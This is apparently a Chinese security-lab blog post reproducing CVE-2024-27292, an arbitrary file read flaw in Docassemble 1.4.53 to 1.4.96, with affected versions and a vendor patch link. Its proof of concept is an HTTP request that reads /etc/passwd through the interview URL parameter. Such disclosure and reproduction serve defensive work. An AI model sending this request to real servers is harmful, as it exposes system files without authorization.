网安引领时代,弥天点亮未来
本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!
Docassemble是Jonathan Pyle个人开发者的一个免费的开源专家系统,用于指导访谈和文档组装。
Docassemble 1.4.53至1.4.96版本存在安全漏洞,该漏洞源于允许攻击者通过操作URL获得对系统信息的未授权的访问。
Docassemble Docassemble 1.4.96
Docassemble Docassemble 1.4.53
1.访问漏洞环境
2.对漏洞进行复现
POC
漏洞复现
GET /interview?i=/etc/passwd HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; QQBrowser/7.0.3698.400)
文件读取成功。
3.Yakit工具加载nuclei文件测试(漏洞存在)
目前厂商已发布升级补丁以修复漏洞,补丁获取链接:
https://github.com/jhpyle/docassemble/commit/97f77dc486a26a22ba804765bfd7058aabd600c9
原文始发于微信公众号(弥天安全实验室):【成功复现】Docassemble任意文件读取漏洞(CVE-2024-27292)
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论